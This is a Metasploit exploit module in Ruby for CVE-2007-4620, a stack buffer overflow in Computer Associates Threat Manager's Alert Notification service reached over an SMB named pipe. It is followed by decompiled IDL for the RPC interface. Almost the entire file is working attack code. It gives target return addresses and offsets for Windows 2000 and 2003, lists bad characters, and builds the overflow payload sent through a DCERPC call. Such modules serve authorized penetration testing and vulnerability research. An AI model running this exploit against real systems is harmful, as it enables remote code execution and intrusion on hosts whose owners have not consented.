Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Computer Associates Alert Notification Buffer Overflow',
15
      'Description'    => %q{
16
          This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1
17
        By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
18
        In order to successfully exploit this vulnerability, you will need valid logon credentials to the target.
19
      },
20
      'Author'         => [ 'MC' ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'CVE', '2007-4620' ],
25
          [ 'OSVDB', '44040' ],
26
          [ 'BID', '28605' ],
27
        ],
28
      'Privileged'     => true,
29
      'DefaultOptions' =>
30
        {
31
          'EXITFUNC' => 'thread',
32
        },
33
      'Payload'        =>
34
        {
35
          'Space'    => 550,
36
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
37
          'StackAdjustment' => -3500,
38
        },
39
      'Platform' => 'win',
40
      'Targets'  =>
41
        [
42
          [ 'Windows 2003 SP0 English',	{ 'Offset' => 979, 'Ret' => 0x77e03efb } ],
43
          [ 'Windows 2000 SP4 English',	{ 'Offset' => 979, 'Ret' => 0x7c30d043 } ],
44
          [ 'CA BrightStor ARCServe Backup 11.5 / Windows 2000 SP4 English', { 'Offset' => 207, 'Ret' => 0x7c2e7993 } ], # Yin Dehui
45
        ],
46
      'DisclosureDate' => '2008-04-04',
47
      'DefaultTarget' => 0))
48

49
    register_options(
50
      [
51
        OptString.new('SMBPIPE', [ true,  "The pipe name to use (alert)", 'alert']),
52
      ])
53
  end
54

55
  def exploit
56
    connect()
57
    smb_login()
58

59
    handle = dcerpc_handle('3d742890-397c-11cf-9bf1-00805f88cb72', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
60
    print_status("Binding to #{handle} ...")
61

62
    dcerpc_bind(handle)
63
    print_status("Bound to #{handle} ...")
64

65
    filler =  rand_text_english(target['Offset']) + [target.ret].pack('V') + make_nops(12)
66
    filler << payload.encoded + rand_text_english(772)
67

68
    sploit =  NDR.string(rand_text_english(rand(1024) + 1) + "\x00") + NDR.string(filler + "\x00")
69
    sploit << NDR.string(rand_text_english(rand(1024) + 1) + "\x00") + NDR.long(0)
70

71
    print_status("Trying target #{target.name}...")
72

73
      begin
74
        dcerpc_call(0x00, sploit)
75
        rescue Rex::Proto::DCERPC::Exceptions::NoResponse
76
      end
77

78
    handler
79
    disconnect
80
  end
81
end
82

83
=begin
84
/*
85
 * IDL code generated by mIDA v1.0.8
86
 * Copyright (C) 2006, Tenable Network Security
87
 * http://cgi.tenablesecurity.com/tenable/mida.php
88
 *
89
 *
90
 * Decompilation information:
91
 * RPC stub type: inline
92
 */
93

94
[ uuid(3d742890-397c-11cf-9bf1-00805f88cb72), version(1.0) ]
95

96
interface mIDA_interface
97
{
98
typedef struct struct_1 {
99
  long elem_1;
100
  [size_is(10000), length_is(elem_1)] struct struct_2 * elem_2;
101
} struct_1 ;
102

103
typedef struct struct_2 {
104
  char elem_1[52];
105
} struct_2 ;
106

107

108
/* opcode: 0x00, address: 0x00401000 */
109

110
long   sub_401000 (
111
  [in][ref][string] char * arg_1,
112
  [out][ref] struct struct_1 * arg_2,
113
  [in][ref][string] char * arg_3
114
);
115

116
}
117
=end
118

119